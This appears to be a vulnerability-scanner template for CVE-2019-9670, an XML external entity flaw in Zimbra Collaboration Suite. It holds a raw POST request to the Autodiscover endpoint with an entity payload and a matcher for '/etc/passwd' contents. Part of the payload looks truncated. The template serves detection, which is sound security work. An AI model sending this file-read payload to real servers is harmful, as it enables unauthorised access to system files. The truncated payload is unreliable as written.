id: CVE-2019-9670 info: name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection author: ree4pwn severity: critical description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component. remediation: | Upgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/46693/ - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories - https://bugzilla.zimbra.com/show_bug.cgi?id=109129 - http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce - http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html - https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/ - https://nvd.nist.gov/vuln/detail/CVE-2019-9670 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-9670 cwe-id: CWE-611 epss-score: 0.97216 epss-percentile: 0.99767 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: synacor product: zimbra_collaboration_suite tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm http: - raw: - | POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml ]> aaaaa &xxe; matchers-condition: and matchers: - type: regex part: body regex: - 'root:.*:0:0:' - "Problem accessing" condition: and - type: status status: - 503 # digest: 490a0046304402200ace230de011d0d4fa1e2d87ae5a116cbfdd963fe87c4db50c2e5f6f662e01b602203fda895c9d0b6f8102a73beed1c38b1cce42cac8632a6cdd13f1d915ef2169c6:922c64590222798bb761d5b6d8e72950